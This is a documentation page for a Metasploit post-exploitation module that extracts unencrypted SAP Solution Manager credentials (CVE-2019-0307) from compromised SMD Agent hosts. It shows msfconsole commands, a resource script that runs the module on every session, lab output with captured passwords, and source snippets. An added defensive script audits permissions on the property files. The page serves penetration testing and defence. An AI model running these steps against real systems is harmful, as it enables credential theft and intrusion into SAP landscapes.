Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server - Metasploit
This page contains detailed information about how to use the post/multi/sap/smdagent_get_properties Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
Module: post/multi/sap/smdagent_get_properties
Source code: modules/post/multi/sap/smdagent_get_properties.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2019-0307
This module retrieves the secstore.properties file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/sap/smdagent_get_properties
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/sap/smdagent_get_properties
msf post(smdagent_get_properties) > show options
... show and set options ...
msf post(smdagent_get_properties) > set SESSION session-id
msf post(smdagent_get_properties) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/sap/smdagent_get_properties")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module retrieves the secstore.properties file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
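A defender-side check for the exposure described above, as an added example that is not part of the module or the original page: it inventories SMD Agent property files under the SAP root and flags any that accounts other than the owner can access. The function names are illustrative, the directory layout is assumed from the paths in this page's sample output, and only POSIX file modes are evaluated.

```ruby
# Added example, not part of the Metasploit module.
# Assumed layout (taken from the paths in the sample output on this page):
#   <sap_root>/<SID>/<instance>/SMDAgent/configuration/<file>
require 'etc'

SMD_FILES = %w[secstore.properties runtime.properties].freeze

# Returns one hash per SMD Agent property file found under sap_root.
def audit_smdagent_files(sap_root = '/usr/sap')
  pattern = File.join(sap_root, '*', '*', 'SMDAgent', 'configuration')
  Dir.glob(pattern).sort.flat_map do |conf_dir|
    sid, instance = conf_dir.split(File::SEPARATOR)[-4, 2]
    SMD_FILES.filter_map do |name|
      path = File.join(conf_dir, name)
      next unless File.file?(path)

      st = File.stat(path)
      mode = st.mode & 0o777
      { sid: sid, instance: instance, file: name, path: path,
        owner: owner_name(st.uid), mode: format('%04o', mode),
        group_access: (mode & 0o070) != 0,   # any group permission bit set
        other_access: (mode & 0o007) != 0 }  # any world permission bit set
    end
  end
end

# Resolve a uid to a login name, falling back to the numeric uid.
def owner_name(uid)
  Etc.getpwuid(uid)&.name || uid.to_s
rescue ArgumentError
  uid.to_s
end

# Files that accounts other than the owner can access.
def exposed_files(findings)
  findings.select { |f| f[:group_access] || f[:other_access] }
end

if __FILE__ == $PROGRAM_NAME
  audit_smdagent_files(ARGV[0] || '/usr/sap').each do |f|
    flag = f[:group_access] || f[:other_access] ? 'EXPOSED' : 'ok'
    puts format('%-7s %s %-10s %s', flag, f[:mode], f[:owner], f[:path])
  end
end
```

Tight file modes limit which local accounts can read the files; they do not change what the files contain, so the fix for CVE-2019-0307 is still needed.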
Verification Steps
- Get a shell or meterpreter session on some host.
- Do: use post/multi/sap/smdagent_get_properties
- Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the session number you wish to run this on.
- Do: run
- If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.
Options
None.
Scenarios
msf6 post(multi/sap/smdagent_get_properties) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH daaadm:TestPass1 (172.16.30.14:22) 192.168.50.2:58316 -> 172.16.30.14:22 (172.16.30.14)
2 meterpreter x64/windows SAP731\Administrator @ SAP731 0.0.0.0:0 -> 172.16.30.80:4444 (172.16.30.80)
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1
SESSION => 1
msf6 post(multi/sap/smdagent_get_properties) > run
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt
[*] Instance: SMDA98
[*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties
[*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties
[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: solman.corp.test.com
[*] SLD port: 50000
[+] SLD username: j2ee_admin
[+] SLD password: asdQWE123
[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123
[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2
SESSION => 2
msf6 post(multi/sap/smdagent_get_properties) > run
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt
[*] Instance: SMDA97
[*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties
[*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties
[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: 172.16.30.46
[*] SLD port: 50000
[+] SLD username: SLDDSUSER
[+] SLD password: asdQWE123
[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123
[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.16.30.100 172.16.30.100 50000/tcp (http) j2ee_admin asdQWE123 Password
172.16.30.100 172.16.30.100 50000/tcp (http) SLDDSUSER asdQWE123 Password
msf6 post(multi/sap/smdagent_get_properties) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.46 50000 tcp soap open SAP Solution Manager
msf6 post(multi/sap/smdagent_get_properties) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2021-03-29 17:58:11 UTC 172.16.30.14 Diagnostics Agent in Solution Manager, stores unencrypted CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
credentials for Solution Manager server 002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
2021-03-29 17:58:23 UTC 172.16.30.80 Diagnostics Agent in Solution Manager, stores unencrypted CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
credentials for Solution Manager server 002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
Msfconsole Usage
Here is how the multi/sap/smdagent_get_properties post exploitation module looks in the msfconsole:
msf6 > use post/multi/sap/smdagent_get_properties
msf6 post(multi/sap/smdagent_get_properties) > show info
Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
Module: post/multi/sap/smdagent_get_properties
Platform: BSD, Linux, OSX, Unix, Windows
Arch:
Rank: Normal
Provided by:
Yvan Genuer
Vladimir Ivanov
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module retrieves the `secstore.properties` file on a SMDAgent.
This file contains the credentials used by the SMDAgent to connect
to the SAP Solution Manager server.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-0307
https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
Module Options
This is a complete list of options available in the multi/sap/smdagent_get_properties post exploitation module:
msf6 post(multi/sap/smdagent_get_properties) > show options
Module options (post/multi/sap/smdagent_get_properties):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the multi/sap/smdagent_get_properties post exploitation module:
msf6 post(multi/sap/smdagent_get_properties) > show advanced
Module advanced options (post/multi/sap/smdagent_get_properties):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/sap/smdagent_get_properties module can do:
msf6 post(multi/sap/smdagent_get_properties) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/sap/smdagent_get_properties post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/sap/smdagent_get_properties) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the error messages listed below. For each one, the accompanying snippet from the module source code can help identify the root cause of the problem.
SAP root directory not found
Here is a relevant code snippet related to the "SAP root directory not found" error message:
  windows = false
  instances = dir(UNIX_PREFIX)
end

if instances.nil? || instances.empty?
  fail_with(Failure::NotFound, 'SAP root directory not found')
end

instances.each do |instance|
  next if instance == 'SYS'

Failed to resolve SLD hostname: <SLD_HOSTNAME>
Here is a relevant code snippet related to the "Failed to resolve SLD hostname: <SLD_HOSTNAME>" error message:
    else
      begin
        sld_address = session.net.resolve.resolve_host(sld_hostname)[:ip]
        print_status("SLD address: #{sld_address}")
      rescue Rex::Post::Meterpreter::RequestError
        print_error("Failed to resolve SLD hostname: #{sld_hostname}")
      end
    end
  end
end
print_status("SLD port: #{sld_port}") unless sld_port.nil?
File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.
Here is a relevant code snippet related to the "File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched." error message:
end

# Store decoded credentials, report service and vuln
print_line
if sld_username.nil? || sld_password.nil?
  print_error("File #{secstore_properties_file_name} read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.")
else
  # Store decoded credentials
  print_good('Store decoded credentials for SolMan server')
  if sld_address.nil? || sld_port.nil?
    service_data = {}
Failed to read properties file: <FILENAME>
Here is a relevant code snippet related to the "Failed to read properties file: <FILENAME>" error message:
def parse_properties_file(filename, is_meterpreter)
  properties = []
  if file_exist?(filename)
    properties_content = read_file(filename)
    if properties_content.nil?
      print_error("Failed to read properties file: #{filename}")
    else
      if is_meterpreter
        agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
      else
        agent_host = session.session_host
File: <FILENAME> does not exist
Here is a relevant code snippet related to the "File: <FILENAME> does not exist" error message:
        loot = store_loot('smdagent.properties', 'text/plain', agent_host, properties_content, filename, 'SMD Agent properties file')
        print_good("File #{filename} saved in: #{loot}")
        properties = parse_properties(properties_content)
      end
    else
      print_error("File: #{filename} does not exist")
    end
    properties
  end

end
References
- CVE-2019-0307
- https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
See Also
Check also the following modules related to this module:
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/admin/sap/sap_igs_xmlchart_xxe
- auxiliary/admin/sap/sap_mgmt_con_osexec
- auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
- auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
- auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
- auxiliary/scanner/sap/sap_icf_public_info
- auxiliary/scanner/sap/sap_icm_urlscan
- auxiliary/scanner/sap/sap_mgmt_con_abaplog
- auxiliary/scanner/sap/sap_mgmt_con_brute_login
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
- auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
- auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
- auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
- auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_startprofile
- auxiliary/scanner/sap/sap_mgmt_con_version
- auxiliary/scanner/sap/sap_router_info_request
- auxiliary/scanner/sap/sap_router_portscanner
- auxiliary/scanner/sap/sap_service_discovery
- auxiliary/scanner/sap/sap_smb_relay
- auxiliary/scanner/sap/sap_soap_bapi_user_create1
- auxiliary/scanner/sap/sap_soap_rfc_brute_login
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
- auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
- auxiliary/scanner/sap/sap_soap_rfc_ping
- auxiliary/scanner/sap/sap_soap_rfc_read_table
- auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
- auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_system_info
- auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
- auxiliary/scanner/sap/sap_web_gui_brute_login
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/multi/sap/sap_mgmt_con_osexec_payload
- exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
- exploit/multi/sap/sap_soap_rfc_sxpg_command_exec
Authors
- Yvan Genuer
- Vladimir Ivanov
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.